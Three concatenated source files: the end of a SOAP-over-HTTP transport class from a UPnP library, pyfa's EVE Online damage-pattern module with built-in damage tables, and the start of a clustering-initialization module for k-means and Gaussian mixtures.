            r = http.client.HTTPSConnection(real_addr)
        else:
            r = http.client.HTTPConnection(real_addr)

        r.putrequest("POST", real_path)
        r.putheader("Host", addr.hostname)
        r.putheader("User-agent", USER_AGENT)
        t = 'text/xml'
        if encoding:
            t += '; charset="%s"' % encoding
        r.putheader("Content-type", t)
        r.putheader("Content-length", str(len(data)))

        # Send HTTP basic authentication when the URL carries credentials.
        # Fix: the original used the non-existent attribute 'addr.user' and
        # base64.encodestring(), which was removed in Python 3.9.
        if addr.username is not None:
            credentials = '%s:%s' % (addr.username, addr.password or '')
            val = base64.b64encode(credentials.encode('utf-8')).decode('ascii')
            r.putheader('Authorization', 'Basic ' + val)

        # This fixes sending either "" or "None"
        if soapaction:
            r.putheader("SOAPAction", '"%s"' % soapaction)
        else:
            r.putheader("SOAPAction", "")

        r.endheaders()
        r.send(data.encode('UTF-8'))

        # Read the response. Fix: http.client.HTTPResponse exposes the
        # status code as .status and the reason phrase as .reason; the
        # original read the non-existent .code (and set msg to it twice).
        reply = r.getresponse()
        code, msg, headers = reply.status, reply.reason, reply.headers
        content_type = headers.get("content-type", "text/xml")
        content_length = headers.get("Content-length")

        if content_length is None:
            data = reply.read()
            message_len = len(data)
        else:
            message_len = int(content_length)
            data = reply.read(message_len)

        # A 500 without an XML body is a transport failure, not a SOAP fault.
        if code == 500 and not \
                (content_type.startswith("text/xml") and message_len > 0):
            raise HTTPError(code, msg)

        if code not in (200, 500):
            raise HTTPError(code, msg)

        # return response payload
        return data.decode('utf-8')
class HTTPError(Exception):
    """ Represents an error of a HTTP request.
    """

    def __init__(self, code, msg):
        """ Constructor for the HTTPError class.

        @param code: error code
        @param msg: error message

        @type code: string
        @type msg: string
        """
        self.code = code
        self.msg = msg

    def __repr__(self):
        return "<HTTPError %s %s>" % (self.code, str(self.msg))

    def __call__(self):
        # Fix: the original spelled this '__call___' (three trailing
        # underscores), so instances were never actually callable.
        return (self.code, self.msg, )
| aleixq/python3-brisa | brisa/upnp/soap.py | Python | mit | 12,811 | [
"Brian"
] | a57462087bcd0f71b66a3aff299ea25391866379216f58869c8eee44f1add0a1 |
# ===============================================================================
# Copyright (C) 2010 Diego Duclos
#
# This file is part of eos.
#
# eos is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# eos is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with eos. If not, see <http://www.gnu.org/licenses/>.
# ===============================================================================
import re
from collections import OrderedDict
from sqlalchemy.orm import reconstructor
import eos.db
def _t(x):
    # Translation placeholder: returns its argument unchanged. Kept so the
    # pattern-name strings below can later be routed through a real
    # gettext-style pipeline without rewriting the table.
    return x
def _c(x):
return '[' + x + ']'
# Order is significant here - UI uses order as-is for built-in patterns
# Each entry maps a (negative) built-in pattern ID to a tuple of:
#   (raw display name, EM amount, thermal amount, kinetic amount, explosive amount)
# Bracketed prefixes in the raw name encode the category hierarchy; a '|'
# before a bracket stops category parsing (see DamagePattern.__parseRawName).
BUILTINS = OrderedDict([
    (-1, (_t('Uniform'), 25, 25, 25, 25)),
    (-2, (_c(_t('Generic')) + _t('EM'), 1, 0, 0, 0)),
    (-3, (_c(_t('Generic')) + _t('Thermal'), 0, 1, 0, 0)),
    (-4, (_c(_t('Generic')) + _t('Kinetic'), 0, 0, 1, 0)),
    (-5, (_c(_t('Generic')) + _t('Explosive'), 0, 0, 0, 1)),
    (-6, (_c(_t('Frequency Crystals')) + '|' + _t('[T2] Aurora'), 5, 3, 0, 0)),
    (-7, (_c(_t('Frequency Crystals')) + '|' + _t('[T2] Scorch'), 9, 2, 0, 0)),
    (-8, (_c(_t('Frequency Crystals')) + _t('Radio'), 5, 0, 0, 0)),
    (-9, (_c(_t('Frequency Crystals')) + _t('Microwave'), 4, 2, 0, 0)),
    (-10, (_c(_t('Frequency Crystals')) + _t('Infrared'), 5, 2, 0, 0)),
    (-11, (_c(_t('Frequency Crystals')) + _t('Standard'), 5, 3, 0, 0)),
    (-12, (_c(_t('Frequency Crystals')) + _t('Ultraviolet'), 6, 3, 0, 0)),
    (-13, (_c(_t('Frequency Crystals')) + _t('Xray'), 6, 4, 0, 0)),
    (-14, (_c(_t('Frequency Crystals')) + _t('Gamma'), 7, 4, 0, 0)),
    (-15, (_c(_t('Frequency Crystals')) + _t('Multifrequency'), 7, 5, 0, 0)),
    (-16, (_c(_t('Frequency Crystals')) + '|' + _t('[T2] Gleam'), 7, 7, 0, 0)),
    (-17, (_c(_t('Frequency Crystals')) + '|' + _t('[T2] Conflagration'), 7.7, 7.7, 0, 0)),
    # Different sizes of plasma do different damage ratios, the values here
    # are average of ratios across sizes
    (-18, (_c(_t('Exotic Plasma')) + '|' + _t('[T2] Mystic'), 0, 66319, 0, 33681)),
    (-19, (_c(_t('Exotic Plasma')) + _t('Meson'), 0, 60519, 0, 39481)),
    (-20, (_c(_t('Exotic Plasma')) + _t('Baryon'), 0, 59737, 0, 40263)),
    (-21, (_c(_t('Exotic Plasma')) + _t('Tetryon'), 0, 69208, 0, 30792)),
    (-22, (_c(_t('Exotic Plasma')) + '|' + _t('[T2] Occult'), 0, 55863, 0, 44137)),
    (-23, (_c(_t('Hybrid Charges')) + '|' + _t('[T2] Spike'), 0, 4, 4, 0)),
    (-24, (_c(_t('Hybrid Charges')) + '|' + _t('[T2] Null'), 0, 6, 5, 0)),
    (-25, (_c(_t('Hybrid Charges')) + _t('Iron'), 0, 2, 3, 0)),
    (-26, (_c(_t('Hybrid Charges')) + _t('Tungsten'), 0, 2, 4, 0)),
    (-27, (_c(_t('Hybrid Charges')) + _t('Iridium'), 0, 3, 4, 0)),
    (-28, (_c(_t('Hybrid Charges')) + _t('Lead'), 0, 3, 5, 0)),
    (-29, (_c(_t('Hybrid Charges')) + _t('Thorium'), 0, 4, 5, 0)),
    (-30, (_c(_t('Hybrid Charges')) + _t('Uranium'), 0, 4, 6, 0)),
    (-31, (_c(_t('Hybrid Charges')) + _t('Plutonium'), 0, 5, 6, 0)),
    (-32, (_c(_t('Hybrid Charges')) + _t('Antimatter'), 0, 5, 7, 0)),
    (-33, (_c(_t('Hybrid Charges')) + '|' + _t('[T2] Javelin'), 0, 8, 6, 0)),
    (-34, (_c(_t('Hybrid Charges')) + '|' + _t('[T2] Void'), 0, 7.7, 7.7, 0)),
    (-35, (_c(_t('Projectile Ammo')) + '|' + _t('[T2] Tremor'), 0, 0, 3, 5)),
    (-36, (_c(_t('Projectile Ammo')) + '|' + _t('[T2] Barrage'), 0, 0, 5, 6)),
    (-37, (_c(_t('Projectile Ammo')) + _t('Carbonized Lead'), 0, 0, 4, 1)),
    (-38, (_c(_t('Projectile Ammo')) + _t('Nuclear'), 0, 0, 1, 4)),
    (-39, (_c(_t('Projectile Ammo')) + _t('Proton'), 3, 0, 2, 0)),
    (-40, (_c(_t('Projectile Ammo')) + _t('Depleted Uranium'), 0, 3, 2, 3)),
    (-41, (_c(_t('Projectile Ammo')) + _t('Titanium Sabot'), 0, 0, 6, 2)),
    (-42, (_c(_t('Projectile Ammo')) + _t('EMP'), 9, 0, 1, 2)),
    (-43, (_c(_t('Projectile Ammo')) + _t('Phased Plasma'), 0, 10, 2, 0)),
    (-44, (_c(_t('Projectile Ammo')) + _t('Fusion'), 0, 0, 2, 10)),
    (-45, (_c(_t('Projectile Ammo')) + '|' + _t('[T2] Quake'), 0, 0, 5, 9)),
    (-46, (_c(_t('Projectile Ammo')) + '|' + _t('[T2] Hail'), 0, 0, 3.3, 12.1)),
    (-47, (_c(_t('Missiles')) + _t('Mjolnir'), 1, 0, 0, 0)),
    (-48, (_c(_t('Missiles')) + _t('Inferno'), 0, 1, 0, 0)),
    (-49, (_c(_t('Missiles')) + _t('Scourge'), 0, 0, 1, 0)),
    (-50, (_c(_t('Missiles')) + _t('Nova'), 0, 0, 0, 1)),
    (-51, (_c(_t('Bombs')) + _t('Electron Bomb'), 6400, 0, 0, 0)),
    (-52, (_c(_t('Bombs')) + _t('Scorch Bomb'), 0, 6400, 0, 0)),
    (-53, (_c(_t('Bombs')) + _t('Concussion Bomb'), 0, 0, 6400, 0)),
    (-54, (_c(_t('Bombs')) + _t('Shrapnel Bomb'), 0, 0, 0, 6400)),
    # Source: ticket #2067 and #2265
    (-55, (_c(_t('NPC')) + _c(_t('Abyssal')) + _t('All'), 126, 427, 218, 230)),
    (-109, (_c(_t('NPC')) + _c(_t('Abyssal')) + _t('Angel'), 450, 72, 80, 398)),
    (-107, (_c(_t('NPC')) + _c(_t('Abyssal')) + _t('Concord'), 53, 559, 94, 295)),
    (-56, (_c(_t('NPC')) + _c(_t('Abyssal')) + _t('Drifter'), 250, 250, 250, 250)),
    (-57, (_c(_t('NPC')) + _c(_t('Abyssal')) + _t('Drones'), 250, 250, 250, 250)),
    (-58, (_c(_t('NPC')) + _c(_t('Abyssal')) + _t('Overmind'), 0, 410, 590, 0)),
    (-108, (_c(_t('NPC')) + _c(_t('Abyssal')) + _t('Sansha'), 569, 431, 0, 0)),
    (-59, (_c(_t('NPC')) + _c(_t('Abyssal')) + _t('Seeker'), 402, 402, 98, 98)),
    (-60, (_c(_t('NPC')) + _c(_t('Abyssal')) + _t('Sleeper'), 313, 313, 187, 187)),
    (-61, (_c(_t('NPC')) + _c(_t('Abyssal')) + _t('Triglavian'), 0, 615, 0, 385)),
    (-62, (_c(_t('NPC')) + _c(_t('Asteroid')) + _t('Angel Cartel'), 1838, 562, 2215, 3838)),
    (-63, (_c(_t('NPC')) + _c(_t('Asteroid')) + _t('Blood Raiders'), 5067, 4214, 0, 0)),
    (-64, (_c(_t('NPC')) + _c(_t('Asteroid')) + _t('Guristas'), 0, 1828, 7413, 0)),
    (-65, (_c(_t('NPC')) + _c(_t('Asteroid')) + _t('Rogue Drone'), 394, 666, 1090, 1687)),
    (-66, (_c(_t('NPC')) + _c(_t('Asteroid')) + _t('Sanshas Nation'), 5586, 4112, 0, 0)),
    (-67, (_c(_t('NPC')) + _c(_t('Asteroid')) + _t('Serpentis'), 0, 5373, 4813, 0)),
    (-68, (_c(_t('NPC')) + _c(_t('Burner')) + _t('Cruor (Blood Raiders)'), 90, 90, 0, 0)),
    (-69, (_c(_t('NPC')) + _c(_t('Burner')) + _t('Dramiel (Angel)'), 55, 0, 20, 96)),
    (-70, (_c(_t('NPC')) + _c(_t('Burner')) + _t('Daredevil (Serpentis)'), 0, 110, 154, 0)),
    (-71, (_c(_t('NPC')) + _c(_t('Burner')) + _t('Succubus (Sanshas Nation)'), 135, 30, 0, 0)),
    (-72, (_c(_t('NPC')) + _c(_t('Burner')) + _t('Worm (Guristas)'), 0, 0, 228, 0)),
    (-73, (_c(_t('NPC')) + _c(_t('Burner')) + _t('Enyo'), 0, 147, 147, 0)),
    (-74, (_c(_t('NPC')) + _c(_t('Burner')) + _t('Hawk'), 0, 0, 247, 0)),
    (-75, (_c(_t('NPC')) + _c(_t('Burner')) + _t('Jaguar'), 36, 0, 50, 182)),
    (-76, (_c(_t('NPC')) + _c(_t('Burner')) + _t('Vengeance'), 232, 0, 0, 0)),
    (-77, (_c(_t('NPC')) + _c(_t('Burner')) + _t('Ashimmu (Blood Raiders)'), 260, 100, 0, 0)),
    (-78, (_c(_t('NPC')) + _c(_t('Burner')) + _t('Talos'), 0, 413, 413, 0)),
    (-79, (_c(_t('NPC')) + _c(_t('Burner')) + _t('Sentinel'), 0, 75, 0, 90)),
    (-80, (_c(_t('NPC')) + _c(_t('Deadspace')) + _t('Angel Cartel'), 369, 533, 1395, 3302)),
    (-81, (_c(_t('NPC')) + _c(_t('Deadspace')) + _t('Blood Raiders'), 6040, 5052, 10, 15)),
    (-82, (_c(_t('NPC')) + _c(_t('Deadspace')) + _t('Guristas'), 0, 1531, 9680, 0)),
    (-83, (_c(_t('NPC')) + _c(_t('Deadspace')) + _t('Rogue Drone'), 276, 1071, 1069, 871)),
    (-84, (_c(_t('NPC')) + _c(_t('Deadspace')) + _t('Sanshas Nation'), 3009, 2237, 0, 0)),
    (-85, (_c(_t('NPC')) + _c(_t('Deadspace')) + _t('Serpentis'), 0, 3110, 1929, 0)),
    # Source: ticket #2067
    (-86, (_c(_t('NPC')) + _c(_t('Invasion')) + _c(_t('Triglavian Entities')) + _t('Dread'), 0, 417, 0, 583)),
    (-87, (_c(_t('NPC')) + _c(_t('Invasion')) + _c(_t('Triglavian Entities')) + _t('Normal Subcaps'), 0, 610, 0, 390)),
    # To avoid errors on msgfmt, we have to mark that '0%' is meaning literally 0% with no-python-format.
    # See also: https://github.com/vslavik/poedit/issues/645
    (-88, (_c(_t('NPC')) + _c(_t('Invasion')) + _c(_t('Triglavian Entities')) +
           # xgettext:no-python-format
           _t('Subcaps w/missiles 0% spool up'), 367, 155, 367, 112)),
    (-89, (_c(_t('NPC')) + _c(_t('Invasion')) + _c(_t('Triglavian Entities')) +
           # xgettext:no-python-format
           _t('Subcaps w/missiles 50% spool up'), 291, 243, 291, 175)),
    (-90, (_c(_t('NPC')) + _c(_t('Invasion')) + _c(_t('Triglavian Entities')) +
           # xgettext:no-python-format
           _t('Subcaps w/missiles 100% spool up'), 241, 301, 241, 217)),
    (-91, (_c(_t('NPC')) + _c(_t('Invasion')) + _c(_t('Amarr EDENCOM Entities')) + _t('Dread/Subcaps'), 583, 417, 0, 0)),
    (-92, (_c(_t('NPC')) + _c(_t('Invasion')) + _c(_t('Caldari EDENCOM Entities')) + _t('Dread'), 1000, 0, 0, 0)),
    (-93, (_c(_t('NPC')) + _c(_t('Invasion')) + _c(_t('Caldari EDENCOM Entities')) + _t('Subcaps'), 511, 21, 29, 440)),
    (-94, (_c(_t('NPC')) + _c(_t('Invasion')) + _c(_t('Gallente EDENCOM Entities')) + _t('Dread/Subcaps'), 0, 417, 583, 0)),
    (-95, (_c(_t('NPC')) + _c(_t('Invasion')) + _c(_t('Minmatar EDENCOM Entities')) + _t('Dread'), 0, 0, 583, 417)),
    (-96, (_c(_t('NPC')) + _c(_t('Invasion')) + _c(_t('Minmatar EDENCOM Entities')) + _t('Subcaps'), 302, 136, 328, 234)),
    (-110, (_c(_t('NPC')) + _c(_t('Invasion')) + _t('Drifter Entities'), 250, 250, 250, 250)),
    (-112, (_c(_t('NPC')) + _c(_t('Invasion')) + _t('Sleeper Entities'), 265, 265, 235, 235)),
    (-111, (_c(_t('NPC')) + _c(_t('Invasion')) + _t('Rogue Drone Entities'), 250, 250, 250, 250)),
    (-97, (_c(_t('NPC')) + _c(_t('Mission')) + _t('Amarr Empire'), 4464, 3546, 97, 0)),
    (-98, (_c(_t('NPC')) + _c(_t('Mission')) + _t('Caldari State'), 0, 2139, 4867, 0)),
    (-99, (_c(_t('NPC')) + _c(_t('Mission')) + _t('CONCORD'), 336, 134, 212, 412)),
    (-100, (_c(_t('NPC')) + _c(_t('Mission')) + _t('Gallente Federation'), 9, 3712, 2758, 0)),
    (-101, (_c(_t('NPC')) + _c(_t('Mission')) + _t('Khanid'), 612, 483, 43, 6)),
    (-102, (_c(_t('NPC')) + _c(_t('Mission')) + _t('Minmatar Republic'), 1024, 388, 1655, 4285)),
    (-103, (_c(_t('NPC')) + _c(_t('Mission')) + _t('Mordus Legion'), 25, 262, 625, 0)),
    (-104, (_c(_t('NPC')) + _c(_t('Mission')) + _t('Thukker'), 0, 52, 10, 79)),
    (-105, (_c(_t('NPC')) + _t('Sansha Incursion'), 1682, 1347, 3678, 3678)),
    (-106, (_c(_t('NPC')) + _t('Sleepers'), 1472, 1472, 1384, 1384))])
class DamagePattern:
    """An EM/thermal/kinetic/explosive damage profile.

    Instances either come from the BUILTINS table above (``builtin`` True)
    or from the database / user imports. The amounts are relative weights,
    not absolute numbers; only their ratios matter for EHP calculations.
    """

    # Canonical ordering of the four damage types; also used to build
    # attribute names like "emAmount" and "...DamageResonance".
    DAMAGE_TYPES = ('em', 'thermal', 'kinetic', 'explosive')
    # Lazily-populated cache of built-in patterns, keyed by negative ID.
    _builtins = None

    def __init__(self, *args, **kwargs):
        self.builtin = False
        self.update(*args, **kwargs)

    @reconstructor
    def init(self):
        # SQLAlchemy bypasses __init__ when loading from the DB, so mark
        # DB-loaded instances as non-builtin here.
        self.builtin = False

    def update(self, emAmount=25, thermalAmount=25, kineticAmount=25, explosiveAmount=25):
        """Set the four damage amounts (defaults give a uniform pattern)."""
        self.emAmount = emAmount
        self.thermalAmount = thermalAmount
        self.kineticAmount = kineticAmount
        self.explosiveAmount = explosiveAmount

    @classmethod
    def getBuiltinList(cls):
        """Return all built-in patterns, in BUILTINS declaration order."""
        if cls._builtins is None:
            cls.__generateBuiltins()
        return list(cls._builtins.values())

    @classmethod
    def getBuiltinById(cls, id):
        """Return the built-in pattern with the given (negative) ID, or None."""
        if cls._builtins is None:
            cls.__generateBuiltins()
        return cls._builtins.get(id)

    @classmethod
    def getDefaultBuiltin(cls):
        """Return the default pattern (ID -1, 'Uniform')."""
        if cls._builtins is None:
            cls.__generateBuiltins()
        return cls._builtins.get(-1)

    @classmethod
    def __generateBuiltins(cls):
        # Materialize the BUILTINS table into DamagePattern instances once.
        cls._builtins = OrderedDict()
        for id, (rawName, em, therm, kin, explo) in BUILTINS.items():
            pattern = DamagePattern(emAmount=em, thermalAmount=therm, kineticAmount=kin, explosiveAmount=explo)
            pattern.ID = id
            pattern.rawName = rawName
            pattern.builtin = True
            cls._builtins[id] = pattern

    def calculateEhp(self, fit):
        """Return effective HP per layer ({'shield'/'armor'/'hull': ehp}) for a fit."""
        ehp = {}
        for (type, attr) in (('shield', 'shieldCapacity'), ('armor', 'armorHP'), ('hull', 'hp')):
            rawCapacity = fit.ship.getModifiedItemAttr(attr)
            ehp[type] = self.effectivify(fit, rawCapacity, type)
        return ehp

    def calculateEffectiveTank(self, fit, tankInfo):
        """Convert raw repair amounts in tankInfo into effective repair amounts.

        Only fields listed in typeMap are converted; others are dropped.
        """
        typeMap = {
            "passiveShield": "shield",
            "shieldRepair": "shield",
            "armorRepair": "armor",
            "armorRepairPreSpool": "armor",
            "armorRepairFullSpool": "armor",
            "hullRepair": "hull"
        }
        ereps = {}
        for field in tankInfo:
            if field in typeMap:
                ereps[field] = self.effectivify(fit, tankInfo[field], typeMap[field])
        return ereps

    def effectivify(self, fit, amount, type):
        """Scale *amount* (HP or rep) by the fit's resists weighted by this pattern.

        ``type`` is the layer name ('shield', 'armor' or 'hull'); hull
        resonance attributes have no layer prefix, hence the empty string.
        NOTE(review): the parameter shadows the ``type`` builtin - kept for
        interface compatibility.
        """
        type = type if type != "hull" else ""
        totalDamage = sum((self.emAmount, self.thermalAmount, self.kineticAmount, self.explosiveAmount))
        specificDivider = 0
        for damageType in self.DAMAGE_TYPES:
            # Compose an attribute name, then make sure the first letter is NOT capitalized
            attrName = "%s%sDamageResonance" % (type, damageType.capitalize())
            attrName = attrName[0].lower() + attrName[1:]
            resonance = fit.ship.getModifiedItemAttr(attrName)
            damage = getattr(self, "%sAmount" % damageType)
            # Weighted average of resonances; "or 1" guards an all-zero pattern.
            specificDivider += damage / float(totalDamage or 1) * resonance
        return amount / (specificDivider or 1)

    # Short token -> full damage-type name.
    # NOTE(review): not referenced within this class; presumably used by
    # external import/export code - confirm before removing.
    importMap = {
        "em": "em",
        "therm": "thermal",
        "kin": "kinetic",
        "exp": "explosive"
    }

    @classmethod
    def oneType(cls, damageType, amount=100):
        """Build a pattern dealing only *damageType* damage."""
        pattern = DamagePattern()
        pattern.update(amount if damageType == "em" else 0,
                       amount if damageType == "thermal" else 0,
                       amount if damageType == "kinetic" else 0,
                       amount if damageType == "explosive" else 0)
        return pattern

    @classmethod
    def importPatterns(cls, text):
        """Parse 'DamageProfile = name,em,therm,kin,exp' lines and persist them.

        Existing patterns (matched by raw name) are updated in place, new
        ones are created. Returns (list of saved patterns, number of
        DamageProfile lines seen, valid or not).
        """
        lines = re.split('[\n\r]+', text)
        patterns = []
        numPatterns = 0
        # When we import damage profiles, we create new ones and update old ones. To do this, get a list of current
        # patterns to allow lookup
        lookup = {}
        current = eos.db.getDamagePatternList()
        for pattern in current:
            lookup[pattern.rawName] = pattern
        for line in lines:
            try:
                if line.strip()[0] == "#":  # comments
                    continue
                line = line.split('#', 1)[0]  # allows for comments
                type, data = line.rsplit('=', 1)
                type, data = type.strip(), data.split(',')
            except (KeyboardInterrupt, SystemExit):
                raise
            except:
                # Data isn't in correct format, continue to next line
                continue
            if type != "DamageProfile":
                continue
            numPatterns += 1
            name, data = data[0], data[1:5]
            fields = {}
            for index, val in enumerate(data):
                try:
                    fields["%sAmount" % cls.DAMAGE_TYPES[index]] = int(val)
                except (KeyboardInterrupt, SystemExit):
                    raise
                except:
                    continue
            if len(fields) == 4:  # Avoid possible blank lines
                if name.strip() in lookup:
                    pattern = lookup[name.strip()]
                    pattern.update(**fields)
                    eos.db.save(pattern)
                else:
                    pattern = DamagePattern(**fields)
                    pattern.rawName = name.strip()
                    eos.db.save(pattern)
                patterns.append(pattern)
        eos.db.commit()
        return patterns, numPatterns

    EXPORT_FORMAT = "DamageProfile = %s,%d,%d,%d,%d\n"

    @classmethod
    def exportPatterns(cls, *patterns):
        """Serialize patterns into the text format understood by importPatterns."""
        out = "# Exported from pyfa\n#\n"
        out += "# Values are in following format:\n"
        out += "# DamageProfile = [name],[EM amount],[Thermal amount],[Kinetic amount],[Explosive amount]\n\n"
        for dp in patterns:
            out += cls.EXPORT_FORMAT % (dp.rawName, dp.emAmount, dp.thermalAmount, dp.kineticAmount, dp.explosiveAmount)
        return out.strip()

    @property
    def name(self):
        # Alias kept for API compatibility with other saveddata classes.
        return self.rawName

    @property
    def fullName(self):
        """Full display name: bracketed category chain plus the short name."""
        categories, tail = self.__parseRawName()
        return '{}{}'.format(''.join('[{}]'.format(c) for c in categories), tail)

    @property
    def shortName(self):
        """Display name without the category prefix."""
        return self.__parseRawName()[1]

    @property
    def hierarchy(self):
        """List of category names parsed from the raw name's [..] prefixes."""
        return self.__parseRawName()[0]

    def __parseRawName(self):
        """Split rawName into ([category, ...], short name).

        Leading '[Category]' groups are collected; a '|' immediately before
        a '[' means the rest (minus the '|') is the short name even though
        it starts with a bracket (e.g. '|[T2] Aurora').
        """
        categories = []
        remainingName = self.rawName.strip() if self.rawName else ''
        while True:
            start, end = remainingName.find('['), remainingName.find(']')
            if start == -1 or end == -1:
                return categories, remainingName
            splitter = remainingName.find('|')
            if splitter != -1 and splitter == start - 1:
                return categories, remainingName[1:]
            categories.append(remainingName[start + 1:end])
            remainingName = remainingName[end + 1:].strip()

    def __deepcopy__(self, memo):
        # Copies are always user patterns: amounts are kept, identity is not.
        p = DamagePattern(self.emAmount, self.thermalAmount, self.kineticAmount, self.explosiveAmount)
        p.rawName = "%s copy" % self.rawName
        return p
| pyfa-org/Pyfa | eos/saveddata/damagePattern.py | Python | gpl-3.0 | 17,901 | [
"Jaguar"
] | 97b6bb3be90f3cab098bc98df75beb94c7767e755f08fe581cc8d3886939ca01 |
# -*- coding: utf-8 -*-
#
#Created on Mon Apr 3 15:14:34 2017
#
#author: Elina Thibeau-Sutre
#
import numpy as np
import random
def initialization_random(n_components,points):
    """
    This method returns an array of n_components points drawn at random
    from the data, which will be used in order to initialize a k_means
    algorithm.

    Parameters
    ----------
    points : an array (n_points,dim)
    n_components : int
        the number of clusters

    Returns
    -------
    means : an array (n_components,dim)
        The initial means computed
    """
    # Doc fix: the docstring used to document a nonexistent parameter 'k'
    # and a second return value 'assignements' that was never returned.
    n_points,_ = points.shape
    # Sampling is done with replacement, so two initial means may coincide.
    idx = np.random.randint(n_points,size = n_components)
    means = points[idx,:]
    return means
def initialization_random_sklearn(n_components,points):
    """
    Computes random responsibilities (soft assignements) the way sklearn
    initializes its mixture models: a random matrix whose rows sum to one.

    Parameters
    ----------
    points : an array (n_points,dim)
    n_components : int
        the number of clusters

    Returns
    -------
    resp : an array (n_points,n_components)
        Random responsibilities; each row sums to 1
    """
    # Doc fix: the docstring used to claim this returns means, but the
    # function returns a responsibility matrix.
    n_points,_ = points.shape
    # NOTE: the seed is hard-coded (RandomState(2)), so the result is
    # deterministic across calls by design.
    random_state = np.random.RandomState(2)
    resp = random_state.rand(n_points,n_components)
    resp /= resp.sum(axis=1)[:,np.newaxis]
    return resp
def initialization_plus_plus(n_components,points,info=False):
    """
    This method returns an array of n_components points which will be used
    in order to initialize a k_means algorithm, chosen with the k-means++
    strategy: each new center is drawn with probability proportional to its
    squared distance to the closest already-chosen center.

    Parameters
    ----------
    points : an array (n_points,dim)
    n_components : int
        the number of clusters
    info : bool
        if True, also return the k-means distortion of the chosen means

    Returns
    -------
    means : an array (n_components,dim)
        The initial means computed
    dist : float | only when info is True
    """
    from .kmeans import dist_matrix
    points = np.asarray(points)
    dist = None
    n_points,dim = points.shape
    probability_vector = np.arange(n_points)/n_points #All points have the same probability to be chosen the first time
    means = np.zeros((n_components,dim))
    for i in range(n_components):
        total_dst = 0
        #Choice of a new value
        # Draw u ~ U(0,1) and walk the cumulative probability vector until
        # it exceeds u (inverse-CDF sampling over the points).
        value_chosen = random.uniform(0,1)
        idx_point = 0
        value = 0
        while (value<value_chosen) and (idx_point+1<n_points):
            idx_point +=1
            value = probability_vector[idx_point]
        means[i] = points[idx_point]
        #Calculation of distances for each point in order to find the probabilities to choose each point
        if i == 0:
            M = np.linalg.norm(points-means[0],axis=1)
            M = M.reshape((n_points,1))
        else:
            M = dist_matrix(points,means[:i+1:])
        # D^2 weighting: cumulative squared distance to the nearest center.
        dst_min = np.amin(M, axis=1)
        dst_min = dst_min**2
        total_dst = np.cumsum(dst_min)
        probability_vector = total_dst/total_dst[-1]
    if info:
        # Score the chosen means with a Kmeans object without fitting it.
        from .kmeans import Kmeans
        km = Kmeans(n_components)
        km.means = means
        km._is_initialized = True
        dist = km.score(points)
        return means, dist
    return means
def initialization_AF_KMC(n_components,points,m=20):
    """
    A method providing good seedings for kmeans inspired by MCMC
    for more information see http://papers.nips.cc/paper/6478-fast-and-provably-good-seedings-for-k-means

    Parameters
    ----------
    points : an array (n_points,dim)
    n_components : int
        the number of clusters
    m : int
        the length of each Markov chain (candidate-improvement steps)

    Returns
    -------
    means : an array (n_components,dim)
        The initial means computed
    """
    from .kmeans import dist_matrix
    n_points,dim = points.shape
    means = np.empty((n_components,dim))
    #Preprocessing step
    # Proposal distribution q: mixture of D^2 weighting w.r.t. a random
    # first center and a uniform term (the paper's assumption-free proposal).
    idx_c = np.random.choice(n_points)
    c = points[idx_c]
    M = np.square(dist_matrix(points,c.reshape(1,-1)))
    q = 0.5 * M / np.sum(M) + 0.5 / n_points
    q = q.reshape(n_points)
    #Main loop
    means[0] = c
    for i in range(n_components-1):
        # We choose a potential candidate
        x_idx = np.random.choice(n_points,p=q)
        x = points[x_idx]
        dist_x = np.linalg.norm(x-means[:i+1:],axis=1).min()
        # dist_x = kmeans3.dist_matrix(x.reshape(1,-1),means[:i+1:]).min()
        # We have m steps to improve this potential new center
        for j in range(m):
            y_idx = np.random.choice(n_points,p=q)
            y = points[y_idx]
            dist_y = np.linalg.norm(y-means[:i+1:],axis=1).min()
            # Metropolis-Hastings acceptance ratio; when the current
            # candidate has zero weight, always accept the challenger.
            if dist_x*q[y_idx] != 0:
                quotient = dist_y*q[x_idx]/(dist_x*q[y_idx])
            else:
                quotient = 2.0
            if quotient > random.uniform(0,1):
                x_idx = y_idx
                x = y
                dist_x = dist_y
        means[i+1] = x
    return means
def initialization_k_means(n_components,points,info=False):
    """
    Initializes means and hard assignements by running a full k-means
    clustering on the data.

    Parameters
    ----------
    points : an array (n_points,dim)
    n_components : int
        the number of clusters
    info : bool
        whether to also return the k-means distortion of the result

    Returns
    -------
    means : an array (n_components,dim)
        The initial means computed
    assignements : an array (n_points,n_components)
        The hard assignements according to kmeans
    dist : float | only when info is True
    """
    from .kmeans import Kmeans
    data = np.asarray(points)
    clusterer = Kmeans(n_components)
    clusterer.fit(data)
    hard_resp = clusterer.predict_assignements(data)
    if not info:
        return clusterer.means, hard_resp
    return clusterer.means, hard_resp, clusterer.score(data)
def initialization_GMM(n_components,points_data,points_test=None,covariance_type="full"):
    """
    Fits a full Gaussian Mixture Model (EM) on the data and returns its
    parameters, which can then be used to initialize another algorithm.

    Parameters
    ----------
    points_data : an array (n_points,dim)
    n_components : int
        the number of clusters
    covariance_type : str
        Type of covariance : 'full' or 'spherical'

    Other Parameters
    ----------------
    points_test : array (n_points_bis,dim) | Optional
        Enables early stopping in order to avoid over fitting.

    Returns
    -------
    means : an array (n_components,dim)
    cov : an array (n_components,dim,dim)
    log_weights : an array (n_components,)
    log_assignements : an array (n_points,n_components)
        The log of the soft assignements according to GMM
    """
    from .GMM import GaussianMixture
    model = GaussianMixture(n_components, covariance_type=covariance_type)
    model.fit(points_data, points_test, patience=0)
    log_resp = model.predict_log_resp(points_data)
    return model.means, model.cov, model.log_weights, log_resp
def initialization_VBGMM(n_components,points_data,points_test=None,covariance_type="full"):
    """
    Fits a Variational Bayesian GMM on the data and returns its parameters,
    which can then be used to initialize another algorithm.

    Parameters
    ----------
    points_data : an array (n_points,dim)
    n_components : int
        the number of clusters
    covariance_type : str
        Type of covariance : 'full' or 'spherical'

    Other Parameters
    ----------------
    points_test : array (n_points_bis,dim) | Optional
        Enables early stopping in order to avoid over fitting.

    Returns
    -------
    means : an array (n_components,dim)
    cov : an array (n_components,dim,dim)
    log_weights : an array (n_components,)
    log_assignements : an array (n_points,n_components)
        The log of the soft assignements according to VBGMM
    """
    from .VBGMM import VariationalGaussianMixture
